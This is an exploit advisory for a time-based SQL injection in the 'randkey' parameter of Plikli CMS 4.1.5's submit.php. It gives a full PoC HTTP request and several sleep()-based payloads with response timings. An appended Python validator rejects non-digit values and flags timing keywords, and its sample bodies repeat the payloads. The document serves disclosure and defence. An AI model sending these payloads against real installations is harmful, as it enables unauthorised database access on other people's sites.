# Exploit Title: Plikli CMS 4.1.5 - 'randkey' SQL Injection
# Discovered by: Ahmet Ümit BAYRAM
# Discovered Date: 05.03.2024
# Vendor Homepage: https://github.com/kkumar326/plikli
# Software Link: https://github.com/kkumar326/plikli/archive/refs/heads/master.zip
# Demo: https://softaculous.com/demos/plikli_cms
# Tested Version: v4.1.5 (latest)
# Tested on: MacOS

### PoC Request ###

POST /pliklicms/submit.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 95
Origin: http://localhost
Connection: close
Referer: http://localhost/pliklicms/submit.php
Cookie: PHPSESSID=7f592f5d5ac82747bb6e682ca456a007; mnm_user=admin; mnm_key=YWRtaW46MjJrTkdHVDVLbG9NWToxZjMxOGY0YTk5OTQwMzkyYjZhOTJlNjI4MWUyZmRiZg%3D%3D; mnm_data=11fe3441ad4723841afd0beace6794ff
Upgrade-Insecure-Requests: 1

url=http%3A%2F%2Fgoogle.com&phase=1&randkey=1426389526396&id=c_1

### Vulnerable Parameter ###

randkey

### Payloads ###

1426389526396*if(now()=sysdate(),sleep(15),0) => 15.581
1426389526396*if(now()=sysdate(),sleep(6),0) => 6.527
1426389526396*if(now()=sysdate(),sleep(0),0) => 0.496
1426389526396*if(now()=sysdate(),sleep(15),0) => 15.488
1426389526396*if(now()=sysdate(),sleep(3),0) => 5.152
1426389526396*if(now()=sysdate(),sleep(0),0) => 0.661
1426389526396*if(now()=sysdate(),sleep(6),0) => 6.851
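
### Added example: validating and flagging randkey ###

A defensive check for the parameter above, added here as an example and not taken from the advisory or from Plikli's code: it parses urlencoded submit.php POST bodies and rejects any `randkey` that is not a plain decimal integer, which the benign PoC value satisfies and every listed payload violates. The function names, the 20-digit bound and the idea that the value is then passed as a bound query parameter are assumptions; the sample bodies are constructed from the request shown above.

```python
import re
from urllib.parse import parse_qs

# Assumption: a legitimate randkey is a short run of ASCII digits, as in the
# PoC request (1426389526396). The 20-digit bound is an arbitrary safety limit.
RANDKEY_RE = re.compile(r"[0-9]{1,20}")

# Function names seen in the advisory's payloads, used only to label alerts.
TIMING_TOKENS = ("sleep(", "sysdate(", "now(")


def check_randkey(body: str) -> dict:
    """Classify the randkey field of a urlencoded submit.php POST body."""
    fields = parse_qs(body, keep_blank_values=True)
    values = fields.get("randkey", [])
    if not values:
        return {"verdict": "missing", "values": []}
    # A repeated randkey is rejected too: which copy the backend reads is unknown.
    bad = [v for v in values if not RANDKEY_RE.fullmatch(v)]
    if len(values) > 1 or bad:
        lowered = " ".join(values).lower()
        timing = any(tok in lowered for tok in TIMING_TOKENS)
        return {"verdict": "time-based-sqli" if timing else "invalid", "values": values}
    return {"verdict": "ok", "values": values}


def safe_randkey(body: str) -> int:
    """Return randkey as an int for use as a bound query parameter, else raise."""
    result = check_randkey(body)
    if result["verdict"] != "ok":
        raise ValueError(f"rejected randkey: {result['verdict']}")
    return int(result["values"][0])


# Constructed sample bodies modelled on the PoC request above.
SAMPLES = [
    "url=http%3A%2F%2Fgoogle.com&phase=1&randkey=1426389526396&id=c_1",
    "url=http%3A%2F%2Fgoogle.com&phase=1&randkey=1426389526396*if(now()=sysdate(),sleep(15),0)&id=c_1",
    "url=http%3A%2F%2Fgoogle.com&phase=1&randkey=1426389526396%2Aif%28now%28%29%3Dsysdate%28%29%2Csleep%286%29%2C0%29&id=c_1",
    "url=http%3A%2F%2Fgoogle.com&phase=1&randkey=abc&id=c_1",
]

if __name__ == "__main__":
    for body in SAMPLES:
        print(check_randkey(body)["verdict"], "<-", body[-40:])
```

The same digit-only rule works as a WAF or log-review filter, since the check runs on the decoded value and so catches the percent-encoded form of the payload as well.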